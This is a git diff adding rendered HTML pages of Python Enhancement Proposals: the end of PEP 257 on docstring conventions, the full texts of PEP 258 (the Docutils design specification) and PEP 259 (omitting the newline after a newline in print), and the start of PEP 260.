Docstring processing tools will strip a uniform amount of indentation +from the second and further lines of the docstring, equal to the +minimum indentation of all non-blank lines after the first line. Any +indentation in the first line of the docstring (i.e., up to the first +newline) is insignificant and removed. Relative indentation of later +lines in the docstring is retained. Blank lines should be removed +from the beginning and end of the docstring.

+

Since code is much more precise than words, here is an implementation +of the algorithm:

+
def trim(docstring):
+    if not docstring:
+        return ''
+    # Convert tabs to spaces (following the normal Python rules)
+    # and split into a list of lines:
+    lines = docstring.expandtabs().splitlines()
+    # Determine minimum indentation (first line doesn't count):
+    indent = sys.maxsize
+    for line in lines[1:]:
+        stripped = line.lstrip()
+        if stripped:
+            indent = min(indent, len(line) - len(stripped))
+    # Remove indentation (first line is special):
+    trimmed = [lines[0].strip()]
+    if indent < sys.maxsize:
+        for line in lines[1:]:
+            trimmed.append(line[indent:].rstrip())
+    # Strip off trailing and leading blank lines:
+    while trimmed and not trimmed[-1]:
+        trimmed.pop()
+    while trimmed and not trimmed[0]:
+        trimmed.pop(0)
+    # Return a single string:
+    return '\n'.join(trimmed)
+
+
+

The docstring in this example contains two newline characters and is +therefore 3 lines long. The first and last lines are blank:

+
def foo():
+    """
+    This is the second line of the docstring.
+    """
+
+
+

To illustrate:

+
>>> print repr(foo.__doc__)
+'\n    This is the second line of the docstring.\n    '
+>>> foo.__doc__.splitlines()
+['', '    This is the second line of the docstring.', '    ']
+>>> trim(foo.__doc__)
+'This is the second line of the docstring.'
+
+
+

Once trimmed, these docstrings are equivalent:

+
def foo():
+    """A multi-line
+    docstring.
+    """
+
+def bar():
+    """
+    A multi-line
+    docstring.
+    """
+
+
+
+
+ +
+

Acknowledgements

+

The “Specification” text comes mostly verbatim from PEP 8 +by Guido van Rossum.

+

This document borrows ideas from the archives of the Python Doc-SIG. +Thanks to all members past and present.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0257.rst

+

Last modified: 2024-04-17 11:35:59 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0258/index.html b/pep-0258/index.html new file mode 100644 index 00000000000..fbc06c49038 --- /dev/null +++ b/pep-0258/index.html @@ -0,0 +1,980 @@ + + + + + + + + PEP 258 – Docutils Design Specification | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 258 – Docutils Design Specification

+
+
Author:
+
David Goodger <goodger at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
256, 257
+
Created:
+
31-May-2001
+
Post-History:
+
13-Jun-2001
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

While this may serve as an interesting design document for the +now-independent docutils, it is no longer slated for inclusion in the +standard library.

+
+
+

Abstract

+

This PEP documents design issues and implementation details for +Docutils, a Python Docstring Processing System (DPS). The rationale +and high-level concepts of a DPS are documented in PEP 256, “Docstring +Processing System Framework”. Also see PEP 256 for a +“Road Map to the Docstring PEPs”.

+

Docutils is being designed modularly so that any of its components can +be replaced easily. In addition, Docutils is not limited to the +processing of Python docstrings; it processes standalone documents as +well, in several contexts.

+

No changes to the core Python language are required by this PEP. Its +deliverables consist of a package for the standard library and its +documentation.

+
+
+

Specification

+
+

Docutils Project Model

+

Project components and data flow:

+
                 +---------------------------+
+                 |        Docutils:          |
+                 | docutils.core.Publisher,  |
+                 | docutils.core.publish_*() |
+                 +---------------------------+
+                  /            |            \
+                 /             |             \
+        1,3,5   /        6     |              \ 7
+       +--------+       +-------------+       +--------+
+       | READER | ----> | TRANSFORMER | ====> | WRITER |
+       +--------+       +-------------+       +--------+
+        /     \\                                  |
+       /       \\                                 |
+ 2    /      4  \\                             8  |
++-------+   +--------+                        +--------+
+| INPUT |   | PARSER |                        | OUTPUT |
++-------+   +--------+                        +--------+
+
+
+

The numbers above each component indicate the path a document’s data +takes. Double-width lines between Reader & Parser and between +Transformer & Writer indicate that data sent along these paths should +be standard (pure & unextended) Docutils doc trees. Single-width +lines signify that internal tree extensions or completely unrelated +representations are possible, but they must be supported at both ends.

+
+

Publisher

+

The docutils.core module contains a “Publisher” facade class and +several convenience functions: “publish_cmdline()” (for command-line +front ends), “publish_file()” (for programmatic use with file-like +I/O), and “publish_string()” (for programmatic use with string I/O). +The Publisher class encapsulates the high-level logic of a Docutils +system. The Publisher class has overall responsibility for +processing, controlled by the Publisher.publish() method:

+
    +
  1. Set up internal settings (may include config files & command-line +options) and I/O objects.
  2. +
  3. Call the Reader object to read data from the source Input object +and parse the data with the Parser object. A document object is +returned.
  4. +
  5. Set up and apply transforms via the Transformer object attached to +the document.
  6. +
  7. Call the Writer object which translates the document to the final +output format and writes the formatted data to the destination +Output object. Depending on the Output object, the output may be +returned from the Writer, and then from the publish() method.
  8. +
+

Calling the “publish” function (or instantiating a “Publisher” object) +with component names will result in default behavior. For custom +behavior (customizing component settings), create custom component +objects first, and pass them to the Publisher or publish_* +convenience functions.

+
+
+

Readers

+

Readers understand the input context (where the data is coming from), +send the whole input or discrete “chunks” to the parser, and provide +the context to bind the chunks together back into a cohesive whole.

+

Each reader is a module or package exporting a “Reader” class with a +“read” method. The base “Reader” class can be found in the +docutils/readers/__init__.py module.

+

Most Readers will have to be told what parser to use. So far (see the +list of examples below), only the Python Source Reader (“PySource”; +still incomplete) will be able to determine the parser on its own.

+

Responsibilities:

+
    +
  • Get input text from the source I/O.
  • +
  • Pass the input text to the parser, along with a fresh document +tree root.
  • +
+

Examples:

+
    +
  • Standalone (Raw/Plain): Just read a text file and process it. +The reader needs to be told which parser to use.

    The “Standalone Reader” has been implemented in module +docutils.readers.standalone.

    +
  • +
  • Python Source: See Python Source Reader below. This Reader is +currently in development in the Docutils sandbox.
  • +
  • Email: RFC 822 headers, quoted excerpts, signatures, MIME parts.
  • +
  • PEP: RFC 822 headers, “PEP xxxx” and “RFC xxxx” conversion to URIs. +The “PEP Reader” has been implemented in module +docutils.readers.pep; see PEP 287 and PEP 12.
  • +
  • Wiki: Global reference lookups of “wiki links” incorporated into +transforms. (CamelCase only or unrestricted?) Lazy +indentation?
  • +
  • Web Page: As standalone, but recognize meta fields as meta tags. +Support for templates of some sort? (After <body>, before +</body>?)
  • +
  • FAQ: Structured “question & answer(s)” constructs.
  • +
  • Compound document: Merge chapters into a book. Master manifest +file?
  • +
+
+
+

Parsers

+

Parsers analyze their input and produce a Docutils document tree. +They don’t know or care anything about the source or destination of +the data.

+

Each input parser is a module or package exporting a “Parser” class +with a “parse” method. The base “Parser” class can be found in the +docutils/parsers/__init__.py module.

+

Responsibilities: Given raw input text and a doctree root node, +populate the doctree by parsing the input text.

+

Example: The only parser implemented so far is for the +reStructuredText markup. It is implemented in the +docutils/parsers/rst/ package.

+

The development and integration of other parsers is possible and +encouraged.

+
+
+

Transformer

+

The Transformer class, in docutils/transforms/__init__.py, stores +transforms and applies them to documents. A transformer object is +attached to every new document tree. The Publisher calls +Transformer.apply_transforms() to apply all stored transforms to +the document tree. Transforms change the document tree from one form +to another, add to the tree, or prune it. Transforms resolve +references and footnote numbers, process interpreted text, and do +other context-sensitive processing.

+

Some transforms are specific to components (Readers, Parser, Writers, +Input, Output). Standard component-specific transforms are specified +in the default_transforms attribute of component classes. After +the Reader has finished processing, the Publisher calls +Transformer.populate_from_components() with a list of components +and all default transforms are stored.

+

Each transform is a class in a module in the docutils/transforms/ +package, a subclass of docutils.transforms.Transform. Transform +classes each have a default_priority attribute which is used by +the Transformer to apply transforms in order (low to high). The +default priority can be overridden when adding transforms to the +Transformer object.

+

Transformer responsibilities:

+
    +
  • Apply transforms to the document tree, in priority order.
  • +
  • Store a mapping of component type name (‘reader’, ‘writer’, etc.) to +component objects. These are used by certain transforms (such as +“components.Filter”) to determine suitability.
  • +
+

Transform responsibilities:

+
    +
  • Modify a doctree in-place, either purely transforming one structure +into another, or adding new structures based on the doctree and/or +external data.
  • +
+

Examples of transforms (in the docutils/transforms/ package):

+
    +
  • frontmatter.DocInfo: Conversion of document metadata (bibliographic +information).
  • +
  • references.AnonymousHyperlinks: Resolution of anonymous references +to corresponding targets.
  • +
  • parts.Contents: Generates a table of contents for a document.
  • +
  • document.Merger: Combining multiple populated doctrees into one. +(Not yet implemented or fully understood.)
  • +
  • document.Splitter: Splits a document into a tree-structure of +subdocuments, perhaps by section. It will have to transform +references appropriately. (Neither implemented not remotely +understood.)
  • +
  • components.Filter: Includes or excludes elements which depend on a +specific Docutils component.
  • +
+
+
+

Writers

+

Writers produce the final output (HTML, XML, TeX, etc.). Writers +translate the internal document tree structure into the final data +format, possibly running Writer-specific transforms first.

+

By the time the document gets to the Writer, it should be in final +form. The Writer’s job is simply (and only) to translate from the +Docutils doctree structure to the target format. Some small +transforms may be required, but they should be local and +format-specific.

+

Each writer is a module or package exporting a “Writer” class with a +“write” method. The base “Writer” class can be found in the +docutils/writers/__init__.py module.

+

Responsibilities:

+
    +
  • Translate doctree(s) into specific output formats.
      +
    • Transform references into format-native forms.
    • +
    +
  • +
  • Write the translated output to the destination I/O.
  • +
+

Examples:

+
    +
  • XML: Various forms, such as:
      +
    • Docutils XML (an expression of the internal document tree, +implemented as docutils.writers.docutils_xml).
    • +
    • DocBook (being implemented in the Docutils sandbox).
    • +
    +
  • +
  • HTML (XHTML implemented as docutils.writers.html4css1).
  • +
  • PDF (a ReportLabs interface is being developed in the Docutils +sandbox).
  • +
  • TeX (a LaTeX Writer is being implemented in the sandbox).
  • +
  • Docutils-native pseudo-XML (implemented as +docutils.writers.pseudoxml, used for testing).
  • +
  • Plain text
  • +
  • reStructuredText?
  • +
+
+
+

Input/Output

+

I/O classes provide a uniform API for low-level input and output. +Subclasses will exist for a variety of input/output mechanisms. +However, they can be considered an implementation detail. Most +applications should be satisfied using one of the convenience +functions associated with the Publisher.

+

I/O classes are currently in the preliminary stages; there’s a lot of +work yet to be done. Issues:

+
    +
  • How to represent multi-file input (files & directories) in the API?
  • +
  • How to represent multi-file output? Perhaps “Writer” variants, one +for each output distribution type? Or Output objects with +associated transforms?
  • +
+

Responsibilities:

+
    +
  • Read data from the input source (Input objects) or write data to the +output destination (Output objects).
  • +
+

Examples of input sources:

+
    +
  • A single file on disk or a stream (implemented as +docutils.io.FileInput).
  • +
  • Multiple files on disk (MultiFileInput?).
  • +
  • Python source files: modules and packages.
  • +
  • Python strings, as received from a client application +(implemented as docutils.io.StringInput).
  • +
+

Examples of output destinations:

+
    +
  • A single file on disk or a stream (implemented as +docutils.io.FileOutput).
  • +
  • A tree of directories and files on disk.
  • +
  • A Python string, returned to a client application (implemented as +docutils.io.StringOutput).
  • +
  • No output; useful for programmatic applications where only a portion +of the normal output is to be used (implemented as +docutils.io.NullOutput).
  • +
  • A single tree-shaped data structure in memory.
  • +
  • Some other set of data structures in memory.
  • +
+
+
+
+

Docutils Package Structure

+
    +
  • Package “docutils”.
      +
    • Module “__init__.py” contains: class “Component”, a base class for +Docutils components; class “SettingsSpec”, a base class for +specifying runtime settings (used by docutils.frontend); and class +“TransformSpec”, a base class for specifying transforms.
    • +
    • Module “docutils.core” contains facade class “Publisher” and +convenience functions. See Publisher above.
    • +
    • Module “docutils.frontend” provides runtime settings support, for +programmatic use and front-end tools (including configuration file +support, and command-line argument and option processing).
    • +
    • Module “docutils.io” provides a uniform API for low-level input +and output. See Input/Output above.
    • +
    • Module “docutils.nodes” contains the Docutils document tree +element class library plus tree-traversal Visitor pattern base +classes. See Document Tree below.
    • +
    • Module “docutils.statemachine” contains a finite state machine +specialized for regular-expression-based text filters and parsers. +The reStructuredText parser implementation is based on this +module.
    • +
    • Module “docutils.urischemes” contains a mapping of known URI +schemes (“http”, “ftp”, “mail”, etc.).
    • +
    • Module “docutils.utils” contains utility functions and classes, +including a logger class (“Reporter”; see Error Handling +below).
    • +
    • Package “docutils.parsers”: markup parsers.
        +
      • Function “get_parser_class(parser_name)” returns a parser module +by name. Class “Parser” is the base class of specific parsers. +(docutils/parsers/__init__.py)
      • +
      • Package “docutils.parsers.rst”: the reStructuredText parser.
      • +
      • Alternate markup parsers may be added.
      • +
      +

      See Parsers above.

      +
    • +
    • Package “docutils.readers”: context-aware input readers.
        +
      • Function “get_reader_class(reader_name)” returns a reader module +by name or alias. Class “Reader” is the base class of specific +readers. (docutils/readers/__init__.py)
      • +
      • Module “docutils.readers.standalone” reads independent document +files.
      • +
      • Module “docutils.readers.pep” reads PEPs (Python Enhancement +Proposals).
      • +
      • Readers to be added for: Python source code (structure & +docstrings), email, FAQ, and perhaps Wiki and others.
      • +
      +

      See Readers above.

      +
    • +
    • Package “docutils.writers”: output format writers.
        +
      • Function “get_writer_class(writer_name)” returns a writer module +by name. Class “Writer” is the base class of specific writers. +(docutils/writers/__init__.py)
      • +
      • Module “docutils.writers.html4css1” is a simple HyperText Markup +Language document tree writer for HTML 4.01 and CSS1.
      • +
      • Module “docutils.writers.docutils_xml” writes the internal +document tree in XML form.
      • +
      • Module “docutils.writers.pseudoxml” is a simple internal +document tree writer; it writes indented pseudo-XML.
      • +
      • Writers to be added: HTML 3.2 or 4.01-loose, XML (various forms, +such as DocBook), PDF, TeX, plaintext, reStructuredText, and +perhaps others.
      • +
      +

      See Writers above.

      +
    • +
    • Package “docutils.transforms”: tree transform classes.
        +
      • Class “Transformer” stores transforms and applies them to +document trees. (docutils/transforms/__init__.py)
      • +
      • Class “Transform” is the base class of specific transforms. +(docutils/transforms/__init__.py)
      • +
      • Each module contains related transform classes.
      • +
      +

      See Transforms above.

      +
    • +
    • Package “docutils.languages”: Language modules contain +language-dependent strings and mappings. They are named for their +language identifier (as defined in Choice of Docstring Format +below), converting dashes to underscores.
        +
      • Function “get_language(language_code)”, returns matching +language module. (docutils/languages/__init__.py)
      • +
      • Modules: en.py (English), de.py (German), fr.py (French), it.py +(Italian), sk.py (Slovak), sv.py (Swedish).
      • +
      • Other languages to be added.
      • +
      +
    • +
    +
  • +
  • Third-party modules: “extras” directory. These modules are +installed only if they’re not already present in the Python +installation.
      +
    • extras/optparse.py and extras/textwrap.py provide +option parsing and command-line help; from Greg Ward’s +http://optik.sf.net/ project, included for convenience.
    • +
    • extras/roman.py contains Roman numeral conversion routines.
    • +
    +
  • +
+
+
+

Front-End Tools

+

The tools/ directory contains several front ends for common +Docutils processing. See Docutils Front-End Tools for details.

+
+
+

Document Tree

+

A single intermediate data structure is used internally by Docutils, +in the interfaces between components; it is defined in the +docutils.nodes module. It is not required that this data +structure be used internally by any of the components, just +between components as outlined in the diagram in the Docutils +Project Model above.

+

Custom node types are allowed, provided that either (a) a transform +converts them to standard Docutils nodes before they reach the Writer +proper, or (b) the custom node is explicitly supported by certain +Writers, and is wrapped in a filtered “pending” node. An example of +condition (a) is the Python Source Reader (see below), where a +“stylist” transform converts custom nodes. The HTML <meta> tag is +an example of condition (b); it is supported by the HTML Writer but +not by others. The reStructuredText “meta” directive creates a +“pending” node, which contains knowledge that the embedded “meta” node +can only be handled by HTML-compatible writers. The “pending” node is +resolved by the docutils.transforms.components.Filter transform, +which checks that the calling writer supports HTML; if it doesn’t, the +“pending” node (and enclosed “meta” node) is removed from the +document.

+

The document tree data structure is similar to a DOM tree, but with +specific node names (classes) instead of DOM’s generic nodes. The +schema is documented in an XML DTD (eXtensible Markup Language +Document Type Definition), which comes in two parts:

+ +

The DTD defines a rich set of elements, suitable for many input and +output formats. The DTD retains all information necessary to +reconstruct the original input text, or a reasonable facsimile +thereof.

+

See The Docutils Document Tree for details (incomplete).

+
+
+

Error Handling

+

When the parser encounters an error in markup, it inserts a system +message (DTD element “system_message”). There are five levels of +system messages:

+
    +
  • Level-0, “DEBUG”: an internal reporting issue. There is no effect +on the processing. Level-0 system messages are handled separately +from the others.
  • +
  • Level-1, “INFO”: a minor issue that can be ignored. There is little +or no effect on the processing. Typically level-1 system messages +are not reported.
  • +
  • Level-2, “WARNING”: an issue that should be addressed. If ignored, +there may be minor problems with the output. Typically level-2 +system messages are reported but do not halt processing
  • +
  • Level-3, “ERROR”: a major issue that should be addressed. If +ignored, the output will contain unpredictable errors. Typically +level-3 system messages are reported but do not halt processing
  • +
  • Level-4, “SEVERE”: a critical error that must be addressed. +Typically level-4 system messages are turned into exceptions which +halt processing. If ignored, the output will contain severe errors.
  • +
+

Although the initial message levels were devised independently, they +have a strong correspondence to VMS error condition severity +levels; the names in quotes for levels 1 through 4 were borrowed +from VMS. Error handling has since been influenced by the log4j +project.

+
+
+

Python Source Reader

+

The Python Source Reader (“PySource”) is the Docutils component that +reads Python source files, extracts docstrings in context, then +parses, links, and assembles the docstrings into a cohesive whole. It +is a major and non-trivial component, currently under experimental +development in the Docutils sandbox. High-level design issues are +presented here.

+
+

Processing Model

+

This model will evolve over time, incorporating experience and +discoveries.

+
    +
  1. The PySource Reader uses an Input class to read in Python packages +and modules, into a tree of strings.
  2. +
  3. The Python modules are parsed, converting the tree of strings into +a tree of abstract syntax trees with docstring nodes.
  4. +
  5. The abstract syntax trees are converted into an internal +representation of the packages/modules. Docstrings are extracted, +as well as code structure details. See AST Mining below. +Namespaces are constructed for lookup in step 6.
  6. +
  7. One at a time, the docstrings are parsed, producing standard +Docutils doctrees.
  8. +
  9. PySource assembles all the individual docstrings’ doctrees into a +Python-specific custom Docutils tree paralleling the +package/module/class structure; this is a custom Reader-specific +internal representation (see the Docutils Python Source DTD). +Namespaces must be merged: Python identifiers, hyperlink targets.
  10. +
  11. Cross-references from docstrings (interpreted text) to Python +identifiers are resolved according to the Python namespace lookup +rules. See Identifier Cross-References below.
  12. +
  13. A “Stylist” transform is applied to the custom doctree (by the +Transformer), custom nodes are rendered using standard nodes as +primitives, and a standard document tree is emitted. See Stylist +Transforms below.
  14. +
  15. Other transforms are applied to the standard doctree by the +Transformer.
  16. +
  17. The standard doctree is sent to a Writer, which translates the +document into a concrete format (HTML, PDF, etc.).
  18. +
  19. The Writer uses an Output class to write the resulting data to its +destination (disk file, directories and files, etc.).
  20. +
+
+
+

AST Mining

+

Abstract Syntax Tree mining code will be written (or adapted) that +scans a parsed Python module, and returns an ordered tree containing +the names, docstrings (including attribute and additional docstrings; +see below), and additional info (in parentheses below) of all of the +following objects:

+
    +
  • packages
  • +
  • modules
  • +
  • module attributes (+ initial values)
  • +
  • classes (+ inheritance)
  • +
  • class attributes (+ initial values)
  • +
  • instance attributes (+ initial values)
  • +
  • methods (+ parameters & defaults)
  • +
  • functions (+ parameters & defaults)
  • +
+

(Extract comments too? For example, comments at the start of a module +would be a good place for bibliographic field lists.)

+

In order to evaluate interpreted text cross-references, namespaces for +each of the above will also be required.

+

See the python-dev/docstring-develop thread “AST mining”, started on +2001-08-14.

+
+
+

Docstring Extraction Rules

+
    +
  1. What to examine:
      +
    1. If the “__all__” variable is present in the module being +documented, only identifiers listed in “__all__” are +examined for docstrings.
    2. +
    3. In the absence of “__all__”, all identifiers are examined, +except those whose names are private (names begin with “_” but +don’t begin and end with “__”).
    4. +
    5. 1a and 1b can be overridden by runtime settings.
    6. +
    +
  2. +
  3. Where:

    Docstrings are string literal expressions, and are recognized in +the following places within Python modules:

    +
      +
    1. At the beginning of a module, function definition, class +definition, or method definition, after any comments. This is +the standard for Python __doc__ attributes.
    2. +
    3. Immediately following a simple assignment at the top level of a +module, class definition, or __init__ method definition, +after any comments. See Attribute Docstrings below.
    4. +
    5. Additional string literals found immediately after the +docstrings in (a) and (b) will be recognized, extracted, and +concatenated. See Additional Docstrings below.
    6. +
    7. @@@ 2.2-style “properties” with attribute docstrings? Wait for +syntax?
    8. +
    +
  4. +
  5. How:

    Whenever possible, Python modules should be parsed by Docutils, not +imported. There are several reasons:

    +
      +
    • Importing untrusted code is inherently insecure.
    • +
    • Information from the source is lost when using introspection to +examine an imported module, such as comments and the order of +definitions.
    • +
    • Docstrings are to be recognized in places where the byte-code +compiler ignores string literal expressions (2b and 2c above), +meaning importing the module will lose these docstrings.
    • +
    +

    Of course, standard Python parsing tools such as the “parser” +library module should be used.

    +

    When the Python source code for a module is not available +(i.e. only the .pyc file exists) or for C extension modules, to +access docstrings the module can only be imported, and any +limitations must be lived with.

    +
  6. +
+

Since attribute docstrings and additional docstrings are ignored by +the Python byte-code compiler, no namespace pollution or runtime bloat +will result from their use. They are not assigned to __doc__ or +to any other attribute. The initial parsing of a module may take a +slight performance hit.

+
+
Attribute Docstrings
+

(This is a simplified version of PEP 224.)

+

A string literal immediately following an assignment statement is +interpreted by the docstring extraction machinery as the docstring of +the target of the assignment statement, under the following +conditions:

+
    +
  1. The assignment must be in one of the following contexts:
      +
    1. At the top level of a module (i.e., not nested inside a compound +statement such as a loop or conditional): a module attribute.
    2. +
    3. At the top level of a class definition: a class attribute.
    4. +
    5. At the top level of the “__init__” method definition of a +class: an instance attribute. Instance attributes assigned in +other methods are assumed to be implementation details. (@@@ +__new__ methods?)
    6. +
    7. A function attribute assignment at the top level of a module or +class definition.
    8. +
    +

    Since each of the above contexts are at the top level (i.e., in the +outermost suite of a definition), it may be necessary to place +dummy assignments for attributes assigned conditionally or in a +loop.

    +
  2. +
  3. The assignment must be to a single target, not to a list or a tuple +of targets.
  4. +
  5. The form of the target:
      +
    1. For contexts 1a and 1b above, the target must be a simple +identifier (not a dotted identifier, a subscripted expression, +or a sliced expression).
    2. +
    3. For context 1c above, the target must be of the form +“self.attrib”, where “self” matches the “__init__” +method’s first parameter (the instance parameter) and “attrib” +is a simple identifier as in 3a.
    4. +
    5. For context 1d above, the target must be of the form +“name.attrib”, where “name” matches an already-defined +function or method name and “attrib” is a simple identifier as +in 3a.
    6. +
    +
  6. +
+

Blank lines may be used after attribute docstrings to emphasize the +connection between the assignment and the docstring.

+

Examples:

+
g = 'module attribute (module-global variable)'
+"""This is g's docstring."""
+
+class AClass:
+
+    c = 'class attribute'
+    """This is AClass.c's docstring."""
+
+    def __init__(self):
+        """Method __init__'s docstring."""
+
+        self.i = 'instance attribute'
+        """This is self.i's docstring."""
+
+def f(x):
+    """Function f's docstring."""
+    return x**2
+
+f.a = 1
+"""Function attribute f.a's docstring."""
+
+
+
+
+
Additional Docstrings
+

(This idea was adapted from PEP 216.)

+

Many programmers would like to make extensive use of docstrings for +API documentation. However, docstrings do take up space in the +running program, so some programmers are reluctant to “bloat up” their +code. Also, not all API documentation is applicable to interactive +environments, where __doc__ would be displayed.

+

Docutils’ docstring extraction tools will concatenate all string +literal expressions which appear at the beginning of a definition or +after a simple assignment. Only the first strings in definitions will +be available as __doc__, and can be used for brief usage text +suitable for interactive sessions; subsequent string literals and all +attribute docstrings are ignored by the Python byte-code compiler and +may contain more extensive API information.

+

Example:

+
def function(arg):
+    """This is __doc__, function's docstring."""
+    """
+    This is an additional docstring, ignored by the byte-code
+    compiler, but extracted by Docutils.
+    """
+    pass
+
+
+ +
+
+
+

Choice of Docstring Format

+

Rather than force everyone to use a single docstring format, multiple +input formats are allowed by the processing system. A special +variable, __docformat__, may appear at the top level of a module +before any function or class definitions. Over time or through +decree, a standard format or set of formats should emerge.

+

A module’s __docformat__ variable only applies to the objects +defined in the module’s file. In particular, the __docformat__ +variable in a package’s __init__.py file does not apply to objects +defined in subpackages and submodules.

+

The __docformat__ variable is a string containing the name of the +format being used, a case-insensitive string matching the input +parser’s module or package name (i.e., the same name as required to +“import” the module or package), or a registered alias. If no +__docformat__ is specified, the default format is “plaintext” for +now; this may be changed to the standard format if one is ever +established.

+

The __docformat__ string may contain an optional second field, +separated from the format name (first field) by a single space: a +case-insensitive language identifier as defined in RFC 1766. A +typical language identifier consists of a 2-letter language code from +ISO 639 (3-letter codes used only if no 2-letter code exists; +RFC 1766 is currently being revised to allow 3-letter codes). If no +language identifier is specified, the default is “en” for English. +The language identifier is passed to the parser and can be used for +language-dependent markup features.

+
+
+

Identifier Cross-References

+

In Python docstrings, interpreted text is used to classify and mark up +program identifiers, such as the names of variables, functions, +classes, and modules. If the identifier alone is given, its role is +inferred implicitly according to the Python namespace lookup rules. +For functions and methods (even when dynamically assigned), +parentheses (‘()’) may be included:

+
This function uses `another()` to do its work.
+
+
+

For class, instance and module attributes, dotted identifiers are used +when necessary. For example (using reStructuredText markup):

+
class Keeper(Storer):
+
+    """
+    Extend `Storer`.  Class attribute `instances` keeps track
+    of the number of `Keeper` objects instantiated.
+    """
+
+    instances = 0
+    """How many `Keeper` objects are there?"""
+
+    def __init__(self):
+        """
+        Extend `Storer.__init__()` to keep track of instances.
+
+        Keep count in `Keeper.instances`, data in `self.data`.
+        """
+        Storer.__init__(self)
+        Keeper.instances += 1
+
+        self.data = []
+        """Store data in a list, most recent last."""
+
+    def store_data(self, data):
+        """
+        Extend `Storer.store_data()`; append new `data` to a
+        list (in `self.data`).
+        """
+        self.data = data
+
+
+

Each of the identifiers quoted with backquotes (“`”) will become +references to the definitions of the identifiers themselves.

+
+
+

Stylist Transforms

+

Stylist transforms are specialized transforms specific to the PySource +Reader. The PySource Reader doesn’t have to make any decisions as to +style; it just produces a logically constructed document tree, parsed +and linked, including custom node types. Stylist transforms +understand the custom nodes created by the Reader and convert them +into standard Docutils nodes.

+

Multiple Stylist transforms may be implemented and one can be chosen +at runtime (through a “–style” or “–stylist” command-line option). +Each Stylist transform implements a different layout or style; thus +the name. They decouple the context-understanding part of the Reader +from the layout-generating part of processing, resulting in a more +flexible and robust system. This also serves to “separate style from +content”, the SGML/XML ideal.

+

By keeping the piece of code that does the styling small and modular, +it becomes much easier for people to roll their own styles. The +“barrier to entry” is too high with existing tools; extracting the +stylist code will lower the barrier considerably.

+
+
+
+
+

Project Web Site

+

A SourceForge project has been set up for this work at +http://docutils.sourceforge.net/.

+
+ +
+

Acknowledgements

+

This document borrows ideas from the archives of the Python +Doc-SIG. Thanks to all members past & present.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0258.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0259/index.html b/pep-0259/index.html new file mode 100644 index 00000000000..e503837479a --- /dev/null +++ b/pep-0259/index.html @@ -0,0 +1,245 @@ + + + + + + + + PEP 259 – Omit printing newline after newline | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 259 – Omit printing newline after newline

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+
11-Jun-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently, the print statement always appends a newline, unless a +trailing comma is used. This means that if we want to print data +that already ends in a newline, we get two newlines, unless +special precautions are taken.

+

I propose to skip printing the newline when it follows a newline +that came from data.

+

In order to avoid having to add yet another magic variable to file +objects, I propose to give the existing ‘softspace’ variable an +extra meaning: a negative value will mean “the last data written +ended in a newline so no space or newline is required.”

+
+
+

Problem

+

When printing data that resembles the lines read from a file using +a simple loop, double-spacing occurs unless special care is taken:

+
>>> for line in open("/etc/passwd").readlines():
+... print line
+...
+root:x:0:0:root:/root:/bin/bash
+
+bin:x:1:1:bin:/bin:
+
+daemon:x:2:2:daemon:/sbin:
+
+(etc.)
+
+>>>
+
+
+

While there are easy work-arounds, this is often noticed only +during testing and requires an extra edit-test roundtrip; the +fixed code is uglier and harder to maintain.

+
+
+

Proposed Solution

+

In the PRINT_ITEM opcode in ceval.c, when a string object is +printed, a check is already made that looks at the last character +of that string. Currently, if that last character is a whitespace +character other than space, the softspace flag is reset to zero; +this suppresses the space between two items if the first item is a +string ending in newline, tab, etc. (but not when it ends in a +space). Otherwise the softspace flag is set to one.

+

The proposal changes this test slightly so that softspace is set +to:

+
    +
  • -1 – if the last object written is a string ending in a +newline
  • +
  • 0 – if the last object written is a string ending in a +whitespace character that’s neither space nor newline
  • +
  • 1 – in all other cases (including the case when the last +object written is an empty string or not a string)
  • +
+

Then, the PRINT_NEWLINE opcode, printing of the newline is +suppressed if the value of softspace is negative; in any case the +softspace flag is reset to zero.

+
+
+

Scope

+

This only affects printing of 8-bit strings. It doesn’t affect +Unicode, although that could be considered a bug in the Unicode +implementation. It doesn’t affect other objects whose string +representation happens to end in a newline character.

+
+
+

Risks

+

This change breaks some existing code. For example:

+
print "Subject: PEP 259\n"
+print message_body
+
+
+

In current Python, this produces a blank line separating the +subject from the message body; with the proposed change, the body +begins immediately below the subject. This is not very robust +code anyway; it is better written as:

+
print "Subject: PEP 259"
+print
+print message_body
+
+
+

In the test suite, only test_StringIO (which explicitly tests for +this feature) breaks.

+
+
+

Implementation

+

A patch relative to current CVS is here:

+
http://sourceforge.net/tracker/index.php?func=detail&aid=432183&group_id=5470&atid=305470
+
+
+
+
+

Rejected

+

The user community unanimously rejected this, so I won’t pursue +this idea any further. Frequently heard arguments against +included:

+
    +
  • It is likely to break thousands of CGI scripts.
  • +
  • Enough magic already (also: no more tinkering with ‘print’ +please).
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0259.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0260/index.html b/pep-0260/index.html new file mode 100644 index 00000000000..f7519e5f365 --- /dev/null +++ b/pep-0260/index.html @@ -0,0 +1,198 @@ + + + + + + + + PEP 260 – Simplify xrange() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 260 – Simplify xrange()

+
+
Author:
+
